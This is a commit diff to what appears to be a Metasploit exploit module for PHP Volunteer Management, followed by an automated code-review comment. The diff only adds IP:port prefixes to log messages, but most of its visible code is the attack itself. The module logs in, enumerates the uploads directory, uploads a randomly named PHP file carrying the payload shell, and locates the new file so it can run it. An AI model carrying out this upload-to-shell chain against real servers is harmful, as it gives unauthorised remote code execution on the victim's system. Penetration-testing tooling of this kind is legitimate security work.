Print IP/Port for each message
parent
43dffbe996
commit
59ea8c9ab9
|
@ -76,7 +76,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# If we don't get a cookie, bail!
|
||||
if res and res.headers['Set-Cookie'] =~ /(PHPVolunteerManagent=\w+);*/
|
||||
cookie = $1
|
||||
vprint_status("Found cookie: #{cookie}")
|
||||
vprint_status("#{@peer} - Found cookie: #{cookie}")
|
||||
else
|
||||
return nil
|
||||
end
|
||||
|
@ -190,54 +190,56 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
base = target_uri.path
|
||||
base << '/' if base[-1, 1] != '/'
|
||||
|
||||
@peer = "#{rhost}:#{rport}"
|
||||
|
||||
# Login
|
||||
username = datastore['USERNAME']
|
||||
password = datastore['PASSWORD']
|
||||
cookie = login(base, username, password)
|
||||
if cookie.nil?
|
||||
print_error("Login failed with \"#{username}:#{password}\"")
|
||||
print_error("#{@peer} - Login failed with \"#{username}:#{password}\"")
|
||||
return
|
||||
end
|
||||
|
||||
print_status("Login successful with #{username}:#{password}")
|
||||
print_status("#{@peer} - Login successful with #{username}:#{password}")
|
||||
|
||||
# Take a snapshot of the uploads directory
|
||||
# Viewing this doesn't actually require the user to login first,
|
||||
# but we supply the cookie anyway to act more like a real user.
|
||||
print_status("Enumerating all the uploads...")
|
||||
print_status("#{@peer} - Enumerating all the uploads...")
|
||||
before = peek_uploads(base, cookie)
|
||||
if before.nil?
|
||||
print_error("Unable to enumerate original uploads")
|
||||
print_error("#{@peer} - Unable to enumerate original uploads")
|
||||
return
|
||||
end
|
||||
|
||||
# Upload our PHP shell
|
||||
print_status("Uploading PHP payload (#{payload.encoded.length.to_s} bytes)")
|
||||
print_status("#{@peer} - Uploading PHP payload (#{payload.encoded.length.to_s} bytes)")
|
||||
fname = rand_text_alpha(rand(10)+6) + '.php'
|
||||
desc = rand_text_alpha(rand(10)+5)
|
||||
php = %Q|<?php #{payload.encoded} ?>|
|
||||
res = upload(base, cookie, fname, php, desc)
|
||||
if res.nil? or res.body !~ /The file was successfuly uploaded/
|
||||
print_error("Failed to upload our file")
|
||||
print_error("#{@peer} - Failed to upload our file")
|
||||
return
|
||||
end
|
||||
|
||||
# Now that we've uploaded our shell, let's take another snapshot
|
||||
# of the uploads directory.
|
||||
print_status("Enumerating new uploads...")
|
||||
print_status("#{@peer} - Enumerating new uploads...")
|
||||
after = peek_uploads(base, cookie)
|
||||
if after.nil?
|
||||
print_error("Unable to enumerate latest uploads")
|
||||
print_error("#{@peer} - Unable to enumerate latest uploads")
|
||||
return
|
||||
end
|
||||
|
||||
# Find the filename of our uploaded shell
|
||||
files = get_my_file(before.body, after.body)
|
||||
if files.empty?
|
||||
print_error("No new file(s) found. The upload probably failed.")
|
||||
print_error("#{@peer} - No new file(s) found. The upload probably failed.")
|
||||
return
|
||||
else
|
||||
vprint_status("Found these new files: #{files.inspect}")
|
||||
vprint_status("#{@peer} - Found these new files: #{files.inspect}")
|
||||
end
|
||||
|
||||
# There might be more than 1 new file, at least execute the first 10
|
||||
|
|
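Review bot: The `vprint_status("#{@peer} - Found cookie: ...")` line in the first hunk reads `@peer`, but `@peer` is only assigned in the second hunk (`@peer = "#{rhost}:#{rport}"`), in what appears to be a different method. If the cookie-handling code is ever reached before that assignment, `@peer` is nil and the message prints with an empty prefix. A small helper such as `def peer; "#{rhost}:#{rport}"; end`, or the framework's own peer helper if the included mixin provides one, would remove the ordering dependency. Separately, the login messages on the new side still interpolate `#{password}` in clear, so the credential ends up in console output and any spooled log; `print_status("#{@peer} - Login successful as #{username}")` would avoid that. Both enclosing methods start and end outside the hunks, so the call order is inferred rather than visible here.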